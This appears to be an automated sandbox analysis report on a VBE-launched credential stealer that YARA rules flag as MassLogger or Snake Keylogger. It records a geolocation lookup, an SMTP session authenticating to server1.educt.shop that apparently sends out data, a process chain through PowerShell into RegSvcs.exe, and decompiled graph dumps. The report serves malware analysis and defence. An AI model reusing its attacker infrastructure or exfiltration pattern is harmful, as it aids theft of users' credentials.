                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=omeh%2B35g8ae5ChTvL0vHVOqajy9omHxvabaH%2FzRT%2F6rvziKEUq%2BUBK6jsyUhIhbU9AqF5keze7yLU9AAHwypPEF2h6N8wxIsihhWqmzbFblXzHr1G78U%2FSoREu%2BQElZDFBZIScTh"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8e480d3c8a308d27-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1333&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2052445&cwnd=251&unsent_bytes=0&cid=c2d681f38d1cdf89&ts=360&x=0"
                                                            2024-11-18 12:44:24 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                                            Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                            TimestampSource PortDest PortSource IPDest IPCommands
                                                            Nov 18, 2024 13:44:31.160269022 CET58749932162.254.34.31192.168.2.4220 server1.educt.shop127.0.0.1 ESMTP Postfix
                                                            Nov 18, 2024 13:44:31.160506010 CET49932587192.168.2.4162.254.34.31EHLO 721680
                                                            Nov 18, 2024 13:44:31.343144894 CET58749932162.254.34.31192.168.2.4250-server1.educt.shop127.0.0.1
                                                            250-PIPELINING
                                                            250-SIZE 204800000
                                                            250-ETRN
                                                            250-STARTTLS
                                                            250-AUTH PLAIN LOGIN
                                                            250-AUTH=PLAIN LOGIN
                                                            250-ENHANCEDSTATUSCODES
                                                            250-8BITMIME
                                                            250-DSN
                                                            250 CHUNKING
                                                            Nov 18, 2024 13:44:31.344428062 CET49932587192.168.2.4162.254.34.31AUTH login c2VuZHhtYWZmbGVAamVydGNvdC5zaG9w
                                                            Nov 18, 2024 13:44:31.524661064 CET58749932162.254.34.31192.168.2.4334 UGFzc3dvcmQ6
                                                            Nov 18, 2024 13:44:31.722270012 CET58749932162.254.34.31192.168.2.4235 2.7.0 Authentication successful
                                                            Nov 18, 2024 13:44:31.722564936 CET49932587192.168.2.4162.254.34.31MAIL FROM:<sendxmaffle@jertcot.shop>
                                                            Nov 18, 2024 13:44:31.912738085 CET58749932162.254.34.31192.168.2.4250 2.1.0 Ok
                                                            Nov 18, 2024 13:44:31.913013935 CET49932587192.168.2.4162.254.34.31RCPT TO:<maffle@jertcot.shop>
                                                            Nov 18, 2024 13:44:32.096177101 CET58749932162.254.34.31192.168.2.4250 2.1.5 Ok
                                                            Nov 18, 2024 13:44:32.097791910 CET49932587192.168.2.4162.254.34.31DATA
                                                            Nov 18, 2024 13:44:32.277010918 CET58749932162.254.34.31192.168.2.4354 End data with <CR><LF>.<CR><LF>
                                                            Nov 18, 2024 13:44:32.277796984 CET49932587192.168.2.4162.254.34.31.
                                                            Nov 18, 2024 13:44:32.470141888 CET58749932162.254.34.31192.168.2.4250 2.0.0 Ok: queued as 056406448A

                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to dive into process behavior distribution

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:07:42:58
                                                            Start date:18/11/2024
                                                            Path:C:\Windows\System32\wscript.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ref#150062.vbe"
                                                            Imagebase:0x7ff62eb20000
                                                            File size:170'496 bytes
                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:1
                                                            Start time:07:43:12
                                                            Start date:18/11/2024
                                                            Path:C:\Windows\System32\wscript.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\pcPseOUmXnpEaeF.vbs"
                                                            Imagebase:0x7ff62eb20000
                                                            File size:170'496 bytes
                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:07:44:01
                                                            Start date:18/11/2024
                                                            Path:C:\Windows\System32\wscript.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\pcPseOUmXnpEaeF.vbs"
                                                            Imagebase:0x7ff62eb20000
                                                            File size:170'496 bytes
                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:6
                                                            Start time:07:44:02
                                                            Start date:18/11/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:7
                                                            Start time:07:44:02
                                                            Start date:18/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:8
                                                            Start time:07:44:04
                                                            Start date:18/11/2024
                                                            Path:C:\Windows\System32\rundll32.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                            Imagebase:0x7ff7ff030000
                                                            File size:71'680 bytes
                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:9
                                                            Start time:07:44:18
                                                            Start date:18/11/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:10
                                                            Start time:07:44:18
                                                            Start date:18/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:12
                                                            Start time:07:44:21
                                                            Start date:18/11/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                            Imagebase:0xd90000
                                                            File size:45'984 bytes
                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2951280494.0000000003206000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000002.2951280494.0000000003206000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:14
                                                            Start time:07:44:22
                                                            Start date:18/11/2024
                                                            Path:C:\Windows\System32\wermgr.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "7064" "2696" "2648" "2700" "0" "0" "2704" "0" "0" "0" "0" "0"
                                                            Imagebase:0x7ff783f90000
                                                            File size:229'728 bytes
                                                            MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:15
                                                            Start time:07:44:22
                                                            Start date:18/11/2024
                                                            Path:C:\Windows\System32\wermgr.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "1888" "2588" "2776" "2068" "0" "0" "2076" "0" "0" "0" "0" "0"
                                                            Imagebase:0x7ff783f90000
                                                            File size:229'728 bytes
                                                            MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:12.7%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:7.3%
                                                              Total number of Nodes:247
                                                              Total number of Limit Nodes:14
                                                              execution_graph 32230 5bfb698 32231 5bfb6de 32230->32231 32235 5bfb878 32231->32235 32238 5bfb868 32231->32238 32232 5bfb7cb 32242 5bfb5d4 32235->32242 32239 5bfb878 32238->32239 32240 5bfb5d4 DuplicateHandle 32239->32240 32241 5bfb8a6 32240->32241 32241->32232 32243 5bfb8e0 DuplicateHandle 32242->32243 32244 5bfb8a6 32243->32244 32244->32232 32245 16146d8 32246 16146e4 32245->32246 32252 1618031 32246->32252 32247 1614713 32248 1614721 32247->32248 32257 5bfa990 32247->32257 32261 5bfa981 32247->32261 32253 161804c 32252->32253 32265 1618268 32253->32265 32271 1618259 32253->32271 32254 1618058 32254->32247 32258 5bfa99f 32257->32258 32293 5bfa538 32258->32293 32262 5bfa990 32261->32262 32263 5bfa538 4 API calls 32262->32263 32264 5bfa9c0 32263->32264 32264->32248 32266 161828a 32265->32266 32267 1618356 32266->32267 32277 161ed68 32266->32277 32281 161f36c 32266->32281 32287 161ef88 32266->32287 32267->32254 32272 1618268 32271->32272 32273 1618356 32272->32273 32274 161ed68 LdrInitializeThunk 32272->32274 32275 161ef88 2 API calls 32272->32275 32276 161f36c 2 API calls 32272->32276 32273->32254 32274->32273 32275->32273 32276->32273 32278 161ed7f 32277->32278 32279 161ed7a 32277->32279 32278->32279 32280 161f4a9 LdrInitializeThunk 32278->32280 32279->32267 32280->32279 32282 161f223 32281->32282 32283 161f364 LdrInitializeThunk 32282->32283 32286 161ed68 LdrInitializeThunk 32282->32286 32285 161f4c1 32283->32285 32285->32267 32286->32282 32289 161efb9 32287->32289 32288 161f119 32288->32267 32289->32288 32291 161f364 LdrInitializeThunk 32289->32291 32292 161ed68 LdrInitializeThunk 32289->32292 32291->32288 32292->32289 32296 5bfa543 32293->32296 32295 5bfc34e 32297 5bfb66c 32296->32297 32298 5bfb677 32297->32298 32299 5bfca74 32298->32299 32302 5bfe6d1 32298->32302 32307 5bfe700 32298->32307 32299->32295 32303 5bfe6da 32302->32303 32304 5bfe69a 32303->32304 32312 5bfe89f 32303->32312 32316 5bfe8b0 32303->32316 32304->32299 32308 5bfe721 32307->32308 32309 5bfe745 32308->32309 32310 5bfe89f 4 API calls 32308->32310 32311 5bfe8b0 4 API calls 32308->32311 32309->32299 32310->32309 32311->32309 32313 5bfe8b0 32312->32313 32314 5bfe8f6 32313->32314 32320 5bfd5fc 32313->32320 32314->32304 32319 5bfe8bd 32316->32319 32317 5bfe8f6 32317->32304 32318 5bfd5fc 4 API calls 32318->32317 32319->32317 32319->32318 32321 5bfd607 32320->32321 32323 5bfe968 32321->32323 32324 5bfd630 32321->32324 32323->32323 32325 5bfd63b 32324->32325 32331 5bfd640 32325->32331 32327 5bfe9d7 32335 6e34108 32327->32335 32344 6e34120 32327->32344 32328 5bfea11 32328->32323 32334 5bfd64b 32331->32334 32332 5bffb78 32332->32327 32333 5bfe700 4 API calls 32333->32332 32334->32332 32334->32333 32337 6e34151 32335->32337 32338 6e34251 32335->32338 32336 6e3415d 32336->32328 32337->32336 32353 6e34389 32337->32353 32363 6e34398 32337->32363 32338->32328 32339 6e3419d 32373 6e35aa0 32339->32373 32388 6e35a9d 32339->32388 32346 6e34151 32344->32346 32347 6e34251 32344->32347 32345 6e3415d 32345->32328 32346->32345 32351 6e34389 2 API calls 32346->32351 32352 6e34398 2 API calls 32346->32352 32347->32328 32348 6e3419d 32349 6e35aa0 2 API calls 32348->32349 32350 6e35a9d 2 API calls 32348->32350 32349->32347 32350->32347 32351->32348 32352->32348 32356 6e34392 32353->32356 32356->32339 32357 6e3441c 32356->32357 32403 6e33380 32356->32403 32357->32339 32358 6e34414 32358->32357 32359 6e34620 GetModuleHandleW 32358->32359 32360 6e3464d 32359->32360 32360->32339 32364 6e3439e 32363->32364 32364->32339 32365 6e33380 GetModuleHandleW 32364->32365 32367 6e3441c 32364->32367 32366 6e34404 32365->32366 32366->32367 32371 6e34680 GetModuleHandleW 32366->32371 32372 6e34670 GetModuleHandleW 32366->32372 32367->32339 32368 6e34414 32368->32367 32369 6e34620 GetModuleHandleW 32368->32369 32370 6e3464d 32369->32370 32370->32339 32371->32368 32372->32368 32374 6e35aa6 32373->32374 32414 6e333fc 32374->32414 32377 6e35b4e 32378 6e35b7a 32377->32378 32379 6e33380 GetModuleHandleW 32377->32379 32378->32378 32380 6e35bbe 32379->32380 32439 6e36870 32380->32439 32445 6e36980 32380->32445 32387 6e333fc GetModuleHandleW 32387->32377 32389 6e35aa0 32388->32389 32390 6e333fc GetModuleHandleW 32389->32390 32391 6e35b32 32390->32391 32396 6e35f50 GetModuleHandleW 32391->32396 32397 6e36000 GetModuleHandleW 32391->32397 32398 6e333e0 GetModuleHandleW 32391->32398 32399 6e333b0 GetModuleHandleW 32391->32399 32400 6e333fc GetModuleHandleW 32391->32400 32392 6e35b4e 32393 6e35b7a 32392->32393 32394 6e33380 GetModuleHandleW 32392->32394 32393->32393 32395 6e35bbe 32394->32395 32401 6e36870 CreateWindowExW 32395->32401 32402 6e36980 CreateWindowExW 32395->32402 32396->32392 32397->32392 32398->32392 32399->32392 32400->32392 32401->32393 32402->32393 32404 6e345d8 GetModuleHandleW 32403->32404 32406 6e34404 32404->32406 32406->32357 32407 6e34670 32406->32407 32411 6e34680 32406->32411 32408 6e34680 32407->32408 32409 6e33380 GetModuleHandleW 32408->32409 32410 6e34694 32409->32410 32410->32358 32412 6e33380 GetModuleHandleW 32411->32412 32413 6e34694 32412->32413 32413->32358 32415 6e33407 32414->32415 32416 6e35b32 32415->32416 32417 6e36161 GetModuleHandleW 32415->32417 32418 6e36170 GetModuleHandleW 32415->32418 32416->32387 32419 6e35f50 32416->32419 32424 6e36000 32416->32424 32429 6e333e0 32416->32429 32434 6e333b0 32416->32434 32417->32416 32418->32416 32421 6e35f60 32419->32421 32420 6e35f6b 32420->32377 32421->32420 32422 6e36161 GetModuleHandleW 32421->32422 32423 6e36170 GetModuleHandleW 32421->32423 32422->32420 32423->32420 32425 6e3602d 32424->32425 32426 6e360ae 32425->32426 32427 6e36161 GetModuleHandleW 32425->32427 32428 6e36170 GetModuleHandleW 32425->32428 32427->32426 32428->32426 32430 6e333e5 32429->32430 32431 6e35f6b 32430->32431 32432 6e36161 GetModuleHandleW 32430->32432 32433 6e36170 GetModuleHandleW 32430->32433 32431->32377 32432->32431 32433->32431 32435 6e333b5 32434->32435 32436 6e333bf 32435->32436 32437 6e36161 GetModuleHandleW 32435->32437 32438 6e36170 GetModuleHandleW 32435->32438 32436->32377 32437->32436 32438->32436 32440 6e36880 32439->32440 32441 6e36886 32439->32441 32440->32378 32442 6e368a0 32441->32442 32443 6e34acc CreateWindowExW 32441->32443 32442->32378 32444 6e369b5 32443->32444 32444->32378 32446 6e36986 32445->32446 32447 6e34acc CreateWindowExW 32446->32447 32448 6e369b5 32447->32448 32448->32378 32449 12bd030 32450 12bd048 32449->32450 32451 12bd0a2 32450->32451 32456 6e36b77 32450->32456 32460 6e36b88 32450->32460 32464 6e378d8 32450->32464 32475 6e34af4 32450->32475 32457 6e36bae 32456->32457 32458 6e34af4 CallWindowProcW 32457->32458 32459 6e36bcf 32458->32459 32459->32451 32461 6e36bae 32460->32461 32462 6e34af4 CallWindowProcW 32461->32462 32463 6e36bcf 32462->32463 32463->32451 32465 6e3785f 32464->32465 32468 6e378db 32464->32468 32465->32451 32466 6e37949 32510 6e34c1c 32466->32510 32468->32466 32469 6e37939 32468->32469 32485 6e37a60 32469->32485 32491 6e37b3c 32469->32491 32497 6e37b1b 32469->32497 32505 6e37a70 32469->32505 32470 6e37947 32476 6e34aff 32475->32476 32477 6e37949 32476->32477 32479 6e37939 32476->32479 32478 6e34c1c CallWindowProcW 32477->32478 32480 6e37947 32478->32480 32481 6e37a60 CallWindowProcW 32479->32481 32482 6e37a70 CallWindowProcW 32479->32482 32483 6e37b1b CallWindowProcW 32479->32483 32484 6e37b3c CallWindowProcW 32479->32484 32481->32480 32482->32480 32483->32480 32484->32480 32486 6e379ef 32485->32486 32488 6e37a6b 32485->32488 32486->32470 32487 6e37b10 32487->32470 32489 6e37b1b CallWindowProcW 32488->32489 32514 6e37b28 32488->32514 32489->32487 32492 6e37afa 32491->32492 32493 6e37b4a 32491->32493 32495 6e37b1b CallWindowProcW 32492->32495 32496 6e37b28 CallWindowProcW 32492->32496 32494 6e37b10 32494->32470 32495->32494 32496->32494 32498 6e37b23 32497->32498 32499 6e37aa7 32497->32499 32503 6e38f60 CallWindowProcW 32498->32503 32504 6e37b39 32498->32504 32501 6e37b1b CallWindowProcW 32499->32501 32502 6e37b28 CallWindowProcW 32499->32502 32500 6e37b10 32500->32470 32501->32500 32502->32500 32503->32504 32504->32470 32506 6e37a76 32505->32506 32508 6e37b1b CallWindowProcW 32506->32508 32509 6e37b28 CallWindowProcW 32506->32509 32507 6e37b10 32507->32470 32508->32507 32509->32507 32511 6e34c27 32510->32511 32512 6e3902a CallWindowProcW 32511->32512 32513 6e38fd9 32511->32513 32512->32513 32513->32470 32515 6e37b39 32514->32515 32517 6e38f60 32514->32517 32515->32487 32518 6e34c1c CallWindowProcW 32517->32518 32519 6e38f7a 32518->32519 32519->32515 32520 6e3b158 32521 6e3b460 32520->32521 32522 6e3b180 32520->32522 32523 6e3b189 32522->32523 32526 6e3a69c 32522->32526 32525 6e3b1ac 32527 6e3a6a7 32526->32527 32528 6e3b4a3 32527->32528 32530 6e3a6b8 32527->32530 32528->32525 32531 6e3b4d8 OleInitialize 32530->32531 32532 6e3b53c 32531->32532 32532->32528

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 530 16119b8-1611a13 534 1611a35-1611a84 530->534 535 1611a15-1611a34 530->535 539 1611a86-1611a8d 534->539 540 1611a9f 534->540 541 1611a96-1611a9d 539->541 542 1611a8f-1611a94 539->542 544 1611aa7 540->544 543 1611aaa-1611abe 541->543 542->543 546 1611ac0-1611ac7 543->546 547 1611ad4-1611adc 543->547 544->543 548 1611ac9-1611acb 546->548 549 1611acd-1611ad2 546->549 550 1611ade-1611ae2 547->550 548->550 549->550 552 1611b42-1611b45 550->552 553 1611ae4-1611af9 550->553 554 1611b47-1611b5c 552->554 555 1611b8d-1611b93 552->555 553->552 561 1611afb-1611afe 553->561 554->555 565 1611b5e-1611b62 554->565 557 1611b99-1611b9b 555->557 558 161268e 555->558 557->558 559 1611ba1-1611ba6 557->559 562 1612693-1612854 558->562 563 161263c-1612640 559->563 564 1611bac 559->564 566 1611b00-1611b02 561->566 567 1611b1d-1611b3b call 16102a8 561->567 583 1612876-1612918 562->583 584 1612856-1612873 562->584 568 1612642-1612645 563->568 569 1612647-161268d 563->569 564->563 570 1611b64-1611b68 565->570 571 1611b6a-1611b88 call 16102a8 565->571 566->567 572 1611b04-1611b07 566->572 567->552 568->562 568->569 570->555 570->571 571->555 572->552 577 1611b09-1611b1b 572->577 577->552 577->567 587 161291a-1612934 583->587 588 161293c 583->588 584->583 589 1612956-161295b 587->589 590 1612936-1612939 587->590 591 161295e-1612ca1 588->591 592 161293e-1612954 588->592 589->591 590->588 601 1612ca3-1612ca5 591->601 602 1612cb2-1612cba 591->602 592->589 603 1612ca7-1612ca9 601->603 604 1612cab-1612cb0 601->604 605 1612cbc-1612cca 602->605 603->605 604->605 608 1612ce0-1612ce8 605->608 609 1612ccc-1612cce 605->609 612 1612ceb-1612cee 608->612 610 1612cd0-1612cd5 609->610 611 1612cd7-1612cde 609->611 610->612 611->612 614 1612cf0-1612cfe 612->614 615 1612d05-1612d09 612->615 614->615 622 1612d00 614->622 616 1612d22-1612d25 615->616 617 1612d0b-1612d19 615->617 618 1612d27-1612d2b 616->618 619 1612d2d-1612d62 616->619 617->616 624 1612d1b 617->624 618->619 621 1612d64-1612d7b 618->621 628 1612dc4-1612dc9 619->628 626 1612d81-1612d8d 621->626 627 1612d7d-1612d7f 621->627 622->615 624->616 629 1612d97-1612da1 626->629 630 1612d8f-1612d95 626->630 627->628 631 1612da9 629->631 632 1612da3 629->632 630->631 634 1612db1-1612dbd 631->634 632->631 634->628
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2951021070.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_1610000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Xbq$Xbq$Xbq$Xbq$Xbq$Xbq
                                                              • API String ID: 0-1317942629
                                                              • Opcode ID: 6efd531f1782e88f95c6e0ed799ef8279121bc227b1ffbdf128143b3ed6c347f
                                                              • Instruction ID: b136074112b6c3048dd3362626ba95e547c8a4c1c012c1d858553c9bac1cfcde
                                                              • Opcode Fuzzy Hash: 6efd531f1782e88f95c6e0ed799ef8279121bc227b1ffbdf128143b3ed6c347f
                                                              • Instruction Fuzzy Hash: 6B728C375493528BC7E18FB1CA521A4BBE1EBD3235738C69DC1C686943D3B28887DB61
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2951021070.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_1610000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: N
                                                              • API String ID: 0-1130791706
                                                              • Opcode ID: d8a2e3678ced392e5bb1d585044a643b5f17483a69924f7c0b3a237c8eab6cda
                                                              • Instruction ID: 9e422c6170d689ab144f2b32ed08281e013276b948ddf2f6cd1c06e0dd274996
                                                              • Opcode Fuzzy Hash: d8a2e3678ced392e5bb1d585044a643b5f17483a69924f7c0b3a237c8eab6cda
                                                              • Instruction Fuzzy Hash: D673E631C10B5A8EDB11EF68C854A9DFBB1FF99300F15D69AE44867225EB70AAC4CF41

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1612 5bf7a68-5bf7a88 1613 5bf7a8f-5bf7aef 1612->1613 1614 5bf7a8a 1612->1614 1616 5bf7af5-5bf7c06 1613->1616 1617 5bf7e22-5bf7e4a 1613->1617 1614->1613 1659 5bf7c08-5bf7c14 1616->1659 1660 5bf7c30 1616->1660 1620 5bf85e7-5bf860f 1617->1620 1621 5bf7e50-5bf7e77 1617->1621 1628 5bf889e 1620->1628 1629 5bf8615-5bf8873 1620->1629 1625 5bf7e7d-5bf7f20 1621->1625 1626 5bf8181-5bf84ed 1621->1626 1788 5bf7f26 call 1613168 1625->1788 1789 5bf7f26 call 1613158 1625->1789 1773 5bf84ef-5bf8504 1626->1773 1774 5bf8506-5bf8517 1626->1774 1630 5bf889f-5bf88a5 1628->1630 1629->1630 1662 5bf7c1e-5bf7c24 1659->1662 1663 5bf7c16-5bf7c1c 1659->1663 1666 5bf7c36-5bf7dd8 1660->1666 1667 5bf7c2e 1662->1667 1663->1667 1742 5bf7dda-5bf7de6 1666->1742 1743 5bf7de7 1666->1743 1667->1666 1669 5bf7f2b-5bf8082 1728 5bf809b-5bf80ac 1669->1728 1729 5bf8084-5bf8099 1669->1729 1736 5bf80ad-5bf8138 1728->1736 1729->1736 1761 5bf8140-5bf817c 1736->1761 1742->1743 1743->1617 1767 5bf85e6 1761->1767 1767->1620 1777 5bf8518-5bf85e5 1773->1777 1774->1777 1777->1767 1788->1669 1789->1669
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Te^q
                                                              • API String ID: 0-671973202
                                                              • Opcode ID: c3d36ea3d91b0e2a1db8333b8a5261ad834bb37b2b2406bb9af2150c728b0278
                                                              • Instruction ID: 88f231e3fabc2e69698351c4cd902ae1fb8050e20212cb6d7a970eb23dbcc530
                                                              • Opcode Fuzzy Hash: c3d36ea3d91b0e2a1db8333b8a5261ad834bb37b2b2406bb9af2150c728b0278
                                                              • Instruction Fuzzy Hash: FB72D174A00218CFDB65DF65D994BADBBB2FB89300F1084E9D909A7364CB35AE85CF50

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
